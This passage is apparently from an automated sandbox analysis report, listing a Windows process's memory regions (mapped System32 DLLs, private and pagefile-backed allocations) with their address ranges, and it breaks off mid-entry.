"ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 1499 start_va = 0x7ff972bc0000 end_va = 0x7ff972c90fff entry_point = 0x7ff972bc0000 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 1500 start_va = 0x7ff973000000 end_va = 0x7ff973065fff entry_point = 0x7ff973000000 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1501 start_va = 0x7ff973070000 end_va = 0x7ff973082fff entry_point = 0x7ff973070000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1502 start_va = 0x7ff973090000 end_va = 0x7ff973107fff entry_point = 0x7ff973090000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1503 start_va = 0x7ff973110000 end_va = 0x7ff973134fff entry_point = 0x7ff973110000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1504 start_va = 0x7ff973140000 end_va = 0x7ff973165fff entry_point = 0x7ff973140000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1505 start_va = 0x7ff973180000 end_va = 0x7ff973202fff entry_point = 0x7ff973180000 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 1506 start_va = 0x7ff973210000 end_va = 0x7ff9732fdfff entry_point = 0x7ff973210000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1507 start_va = 0x7ff9733b0000 end_va = 0x7ff973445fff entry_point = 0x7ff9733b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1508 start_va = 0x7ff973450000 end_va = 0x7ff973476fff entry_point = 0x7ff973450000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1509 start_va = 0x7ff973590000 end_va = 0x7ff9735b7fff entry_point = 0x7ff973590000 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 1510 start_va = 0x7ff9739b0000 end_va = 0x7ff9739bbfff entry_point = 0x7ff9739b0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1511 start_va = 0x7ff973bb0000 end_va = 0x7ff973bd5fff entry_point = 0x7ff973bb0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1512 start_va = 0x7ff973be0000 end_va = 0x7ff973bebfff entry_point = 0x7ff973be0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1513 start_va = 0x7ff973ca0000 end_va = 0x7ff973cd1fff entry_point = 0x7ff973ca0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1514 start_va = 0x7ff973d80000 end_va = 0x7ff973d89fff entry_point = 0x7ff973d80000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1515 start_va = 0x7ff973e20000 end_va = 0x7ff973e52fff entry_point = 0x7ff973e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1516 start_va = 0x7ff973f10000 end_va = 0x7ff973fb7fff entry_point = 0x7ff973f10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1517 start_va = 0x7ff974000000 end_va = 0x7ff97401efff entry_point = 0x7ff974000000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1518 start_va = 0x7ff974170000 end_va = 0x7ff9741ccfff entry_point = 0x7ff974170000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1519 start_va = 0x7ff9741d0000 end_va = 0x7ff9741e6fff entry_point = 0x7ff9741d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1520 start_va = 0x7ff974340000 end_va = 0x7ff97434afff entry_point = 0x7ff974340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1521 start_va = 0x7ff9743d0000 end_va = 0x7ff974405fff entry_point = 0x7ff9743d0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1522 start_va = 0x7ff974410000 end_va = 0x7ff974435fff entry_point = 0x7ff974410000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1523 start_va = 0x7ff974520000 end_va = 0x7ff97454bfff entry_point = 0x7ff974520000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1524 start_va = 0x7ff974720000 end_va = 0x7ff97478afff entry_point = 0x7ff974720000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1525 start_va = 0x7ff974790000 end_va = 0x7ff974827fff entry_point = 0x7ff974790000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1526 start_va = 0x7ff974830000 end_va = 0x7ff974887fff entry_point = 0x7ff974830000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1527 start_va = 0x7ff9748a0000 end_va = 0x7ff9748c7fff entry_point = 0x7ff9748a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1528 start_va = 0x7ff974960000 end_va = 0x7ff974970fff entry_point = 0x7ff974960000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1529 start_va = 0x7ff974980000 end_va = 0x7ff974992fff entry_point = 0x7ff974980000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1530 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1531 start_va = 0x7ff9749b0000 end_va = 0x7ff9749f9fff entry_point = 0x7ff9749b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1532 start_va = 0x7ff974a00000 end_va = 0x7ff974bc0fff entry_point = 0x7ff974a00000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1533 start_va = 0x7ff974bd0000 end_va = 0x7ff974c23fff entry_point = 0x7ff974bd0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1534 start_va = 0x7ff974c30000 end_va = 0x7ff975257fff entry_point = 0x7ff974c30000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1535 start_va = 0x7ff975310000 end_va = 0x7ff9753c2fff entry_point = 0x7ff975310000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1536 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1537 start_va = 0x7ff9755b0000 end_va = 0x7ff9755f3fff entry_point = 0x7ff9755b0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1538 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1539 start_va = 0x7ff975900000 end_va = 0x7ff976e24fff entry_point = 0x7ff975900000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1540 start_va = 0x7ff976f70000 end_va = 0x7ff976f77fff entry_point = 0x7ff976f70000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1541 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1542 start_va = 0x7ff977030000 end_va = 0x7ff9771f4fff entry_point = 0x7ff977030000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1543 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1544 start_va = 0x7ff977360000 end_va = 0x7ff9773b0fff entry_point = 0x7ff977360000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1545 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1546 start_va = 0x7ff977460000 end_va = 0x7ff9774bafff entry_point = 0x7ff977460000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1547 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1548 start_va = 0x7ff977650000 end_va = 0x7ff9776befff entry_point = 0x7ff977650000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 1549 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1550 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1551 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1552 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1553 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1554 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1555 start_va = 0x7ff977cb0000 end_va = 0x7ff977d18fff entry_point = 0x7ff977cb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1556 start_va = 0x7ff977d40000 end_va = 0x7ff977de4fff entry_point = 0x7ff977d40000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1557 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1558 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1560 start_va = 0x7490000 end_va = 0x75c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007490000" filename = "" Region: id = 1561 start_va = 0x4760000 end_va = 0x4760fff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 1562 start_va = 0x7ff972350000 end_va = 0x7ff97236ffff entry_point = 0x7ff972350000 region_type = mapped_file name = "avifil32.dll" filename = "\\Windows\\System32\\avifil32.dll" (normalized: "c:\\windows\\system32\\avifil32.dll") Region: id = 1563 start_va = 0x7ff96f280000 end_va = 0x7ff96f2a8fff entry_point = 0x7ff96f280000 region_type = mapped_file name = "msvfw32.dll" filename = "\\Windows\\System32\\msvfw32.dll" (normalized: "c:\\windows\\system32\\msvfw32.dll") Region: id = 1564 start_va = 0x7ff972240000 end_va = 0x7ff97225bfff entry_point = 0x7ff972240000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 1565 start_va = 0x4770000 end_va = 0x4771fff entry_point = 0x4770000 region_type = mapped_file name = "msvfw32.dll.mui" filename = "\\Windows\\System32\\en-US\\msvfw32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msvfw32.dll.mui") Region: id = 1566 start_va = 0x75d0000 end_va = 0x7abffff entry_point = 0x0 region_type = private name = "private_0x00000000075d0000" filename = "" Region: id = 1567 start_va = 0x7ff977820000 end_va = 0x7ff977827fff entry_point = 0x7ff977820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1568 start_va = 0x4780000 end_va = 0x4786fff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 1569 start_va = 0x5a90000 end_va = 0x5b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a90000" filename = "" Region: id = 1570 start_va = 0x7ff62a0dc000 end_va = 0x7ff62a0ddfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0dc000" filename = "" Region: id = 1571 start_va = 0x75d0000 end_va = 0x764ffff entry_point = 0x0 region_type = private name = "private_0x00000000075d0000" filename = "" Region: id = 1572 start_va = 0x76b0000 end_va = 0x7abffff entry_point = 0x0 region_type = private name = "private_0x00000000076b0000" filename = "" Region: id = 1573 start_va = 0x7ac0000 end_va = 0x7b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000007ac0000" filename = "" Region: id = 1574 start_va = 0x7ff62a08a000 end_va = 0x7ff62a08bfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a08a000" filename = "" Region: id = 1575 start_va = 0x7ff62a096000 end_va = 0x7ff62a097fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a096000" filename = "" Region: id = 1576 start_va = 0x7b40000 end_va = 0x7bbffff entry_point = 0x0 region_type = private name = "private_0x0000000007b40000" filename = "" Region: id = 1577 start_va = 0x7bc0000 end_va = 0x7c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000007bc0000" filename = "" Region: id = 1578 start_va = 0x7ff62a086000 end_va = 0x7ff62a087fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a086000" filename = "" Region: id = 1579 start_va = 0x7ff62a088000 end_va = 0x7ff62a089fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a088000" filename = "" Region: id = 1580 start_va = 0x1bd0000 end_va = 0x1c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1581 start_va = 0x22e0000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1582 start_va = 0x2360000 end_va = 0x23dffff entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 1583 start_va = 0x4460000 end_va = 0x44dffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 1584 start_va = 0x7ff62a0e2000 end_va = 0x7ff62a0e3fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0e2000" filename = "" Region: id = 1585 start_va = 0x7ff62a0fc000 end_va = 0x7ff62a0fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0fc000" filename = "" Region: id = 1586 start_va = 0x7ff62a0fe000 end_va = 0x7ff62a0fffff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0fe000" filename = "" Region: id = 1587 start_va = 0x7ff62a229000 end_va = 0x7ff62a22afff entry_point = 0x0 region_type = private name = "private_0x00007ff62a229000" filename = "" Region: id = 1588 start_va = 0x39d0000 end_va = 0x39d0fff entry_point = 0x39d0000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1589 start_va = 0x7ff960020000 end_va = 0x7ff960c18fff entry_point = 0x7ff960020000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1603 start_va = 0x44e0000 end_va = 0x44e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 1604 start_va = 0x44f0000 end_va = 0x44fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 1605 start_va = 0x7ff96d300000 end_va = 0x7ff96d314fff entry_point = 0x7ff96d300000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1606 start_va = 0x7ff96f600000 end_va = 0x7ff96f667fff entry_point = 0x7ff96f600000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1607 start_va = 0x7ff973d00000 end_va = 0x7ff973d73fff entry_point = 0x7ff973d00000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1608 start_va = 0x1bd0000 end_va = 0x1bd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bd0000" filename = "" Region: id = 1609 start_va = 0x7ff9695e0000 end_va = 0x7ff9695f3fff entry_point = 0x7ff9695e0000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1610 start_va = 0x7ff96aef0000 end_va = 0x7ff96af0efff entry_point = 0x7ff96aef0000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1611 start_va = 0x7ff973880000 end_va = 0x7ff9738a2fff entry_point = 0x7ff973880000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1626 start_va = 0x1be0000 end_va = 0x1be9fff entry_point = 0x1be0000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1638 start_va = 0x22e0000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1639 start_va = 0x7ff62a229000 end_va = 0x7ff62a22afff entry_point = 0x0 region_type = private name = "private_0x00007ff62a229000" filename = "" Region: id = 1686 start_va = 0x1bf0000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 1687 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1688 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1689 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1690 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1691 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1692 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1693 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1694 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1695 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1696 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1697 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1698 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1699 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1700 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1701 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1702 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1703 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1704 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1705 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1706 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1707 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1708 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1709 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1710 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1711 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1712 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1713 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1714 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1715 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1716 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1717 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1731 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1732 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1733 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1734 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1735 start_va = 0x1bf0000 end_va = 0x1bf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1762 start_va = 0x1bf0000 end_va = 0x1bf3fff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 1763 start_va = 0x1c00000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 1764 start_va = 0xd580000 end_va = 0xda71fff entry_point = 0x0 region_type = private name = "private_0x000000000d580000" filename = "" Region: id = 1765 start_va = 0x1c10000 end_va = 0x1c14fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 1766 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1767 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1768 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1769 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 1770 start_va = 0x1c00000 end_va = 0x1c04fff entry_point = 0x0 region_type = pagefile_backed name = 